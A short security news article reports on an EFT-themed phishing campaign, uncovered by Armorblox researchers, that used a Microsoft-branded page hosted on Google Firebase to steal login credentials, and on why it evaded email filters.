A phishing attack recently uncovered by researchers pretends to share information about an electronic funds transfer (EFT) by offering up a link to download an HTML invoice that then loads to a page with Microsoft Office branding that’s hosted on Google Firebase.
The attack culminates with a final phishing page that looks to extract a victim’s Microsoft login credentials, alternate email address, and phone number, Armorblox researchers wrote in a blog post.
Impersonating Microsoft to phish for account credentials continues to be a powerful technique because it’s a way for attackers to insert themselves into normal business workflows, said Rajat Upadhyaya, head of engineering at Armorblox.
“Viewing documents via Office 365 is something we do every day, so victims might think it's not unusual to enter login credentials in this situation,” Upadhyaya said. “Plus, hosting the final phishing page on Google Firebase lends the domain inherent legitimacy and allows it to bypass email security blocklists and filters.”
The email attack bypassed native Microsoft email security controls. Microsoft assigned a Spam Confidence Level (SCL) of ‘1’ to this email, which means that tech giant did not determine the email as suspicious and delivered it to end user mailboxes.
“The individual techniques have been employed by hackers before, but it's the combination of techniques that makes it possible for this email attack to bypass Microsoft email security as well as pass the eye tests of victims,” Upadhyaya said.
“Employing link redirects and a downloadable HTML file to view the final payload makes it difficult for security technologies to follow the link to its final destination,” he explained.